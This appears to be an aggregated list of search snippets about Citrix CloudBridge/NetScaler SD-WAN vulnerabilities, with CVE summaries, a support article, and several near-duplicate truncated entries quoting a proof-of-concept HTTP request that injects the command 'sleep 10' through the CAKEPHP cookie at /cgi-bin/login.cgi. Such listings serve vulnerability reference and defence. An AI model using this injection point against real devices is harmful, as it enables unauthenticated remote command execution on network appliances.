Acceleration Does Not Work After Cisco ASA 8.x is Configured to Allow TCP Options

Installed Citrix CloudBridge as INLINE in two sites, which are connected through an IPSec VPN using Cisco ASA firewall. The TCP option policy, as suggested in CTX112401 – Acceleration Does Not Take Place for Configured Traffic Types, is applied to ASA, but acceleration still does not work. The...

VulnCheck KEV: CVE-2017-6316

A vulnerability has been identified in the management interface of Citrix NetScaler SD-WAN Enterprise and Standard Edition and Citrix CloudBridge Virtual WAN Edition that could result in an unauthenticated, remote attacker being able to execute arbitrary code as a root user. This vulnerability...

Citrix CloudBridge RCE

Remote command execution vulnerability in Citrix CloudBridge Vulnerability Type: Remote Command Execution For the exploit source code contact DSquare Security sales team...

Citrix CloudBridge - CAKEPHP Cookie Command Injection Vulnerability

Exploit for cgi platform in category web applications POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1 Host: 10.242.129.149 Accept: / Accept-Language: en User-Agent: Mozilla/5.0 compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0 Connection: close Referer:...

Citrix CloudBridge CAKEPHP Cookie Command Injection

POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1 Host: 10.242.129.149 Accept: / Accept-Language: en User-Agent: Mozilla/5.0 compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0 Connection: close Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/ Cookie: CAKEPHP=sleep 10 Content-Type...

Citrix CloudBridge - CAKEPHP Cookie Command Injection

Citrix CloudBridge - CAKEPHP Cookie Command Injection POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1 Host: 10.242.129.149 Accept: / Accept-Language: en User-Agent: Mozilla/5.0 compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0 Connection: close Referer:...

Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection

POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1 Host: 10.242.129.149 Accept: / Accept-Language: en User-Agent: Mozilla/5.0 compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0 Connection: close Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/ Cookie: CAKEPHP=sleep 10 Content-Type...

CVE-2015-8277 - Citrix Licensing Security Updates

Description of Problem A vulnerability has been identified in Citrix Licensing that could allow a remote, unauthenticated attacker to crash the License Server and potentially execute arbitrary code on the server. This vulnerability affects the following products: Citrix License Server for Windows...